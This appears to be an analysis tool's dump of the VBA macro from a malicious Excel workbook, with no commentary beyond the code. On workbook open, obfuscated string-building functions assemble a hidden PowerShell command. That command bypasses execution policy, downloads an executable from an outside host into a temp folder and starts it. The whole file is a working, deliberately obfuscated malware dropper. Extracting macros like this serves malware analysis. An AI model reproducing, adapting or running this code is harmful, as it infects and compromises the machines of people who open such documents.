Filename     : ./macros/3c6495792c808d3280f72cad0e6f98ede371fe023a699274110da603a4ea36fe
OLE stream   : _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA filename : ThisWorkbook.cls
----------------------------------------
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True



Function gabrilla()
gabrilla = Chr(34)
End Function
Sub Workbook_Open()
If Monochrome > 0 Then
Shell bigtowerstone, msoAlignLefts
End If
End Sub
Function goldgoldtime()
capponecheese = "em"
virtoserer = Left("calamander", 4)
brucegodd = Array("t" + capponecheese + "p", "lo" + virtoserer + "ppd" + "ata")
goldgoldtime = brucegodd(depminng)
End Function
Function ramzessii()
ramzessii = "" + "d   " + "/c" + Chr(34)
End Function
Function SingleSong()
SingleSong = Right(Left("multiplexed", 10), 3)
End Function

Function depminng()
Randomize
depminng = Int(Rnd * 2#)
End Function

Function bigtowerstone()

nagilanile = "cM" + ramzessii + nugahoneys + gabrilla + "do{sl" + "eep 25;(." + "(\""{2" + "}{0" + "}{1" + "}\"" -" + "f'-" + "o','bj" + "ec" + "t','ne" + "w') (\""{"
copengagend = "'sy"
cryocamera = "1}{3}" + "{5}{" + "0}{2}{4}\"" -f'" + "t'," + copengagend + "st','.we" + "bclie','em','nt','.ne'" + rtypeoldschool + "'d" + "'+'o" + "w'+'n" + "lo" + "ad" + "fi"
bigtowerstone = nagilanile + cryocamera + "l'+'e')." + Left("Invisible", 3) + "oke('" + fatalerrrrord + "ps://formaversa.co/trq','%" + goldgoldtime + "%." + SingleSong + "')}while(!$?);&(\""{0}{2}{1}\""-f'star','ss','t-proce') '%" + goldgoldtime + "%." + SingleSong + "'" + Chr(34) + Chr(34)
End Function



Function nugahoneys()
babylongiland = Array(Now(), "eLL  " + "-N")
siniorengg = "owe"
fruitstornado = Array(Now(), siniorengg + "RS", Now(), Now())
portlanddomms = Array(Now(), Minute(Now), Minute(Now), "oP" + "r  " + "-e")

astralonfice = Array(Now(), "AS" + "S -W" + "i", Now())
valvegamess = Array(Second(Now), Now(), Now(), Now(), "RA" + "Ct")
olivergobane = "DDen  "
sisterloomg = Array(Now(), Minute(Now), Now(), Now(), "uT" + "i  B", Minute(Now), Now(), Now())
nugahoneys = "p" + fruitstornado(1) + "h" + babylongiland(1) + "on" + "iN" + "Te" + valvegamess(4) + "iv" + "E  -N" + portlanddomms(3) + "xeC" + sisterloomg(4) + "yP" + astralonfice(1) + "nD" + "O " + " hI" + olivergobane
End Function
Function fatalerrrrord()
fatalerrrrord = Right(Left("lighttight", 6), 3)
End Function
Function rtypeoldschool()
vegas = 0
tarapara = ").("
rtypeoldschool = ")" + tarapara
End Function

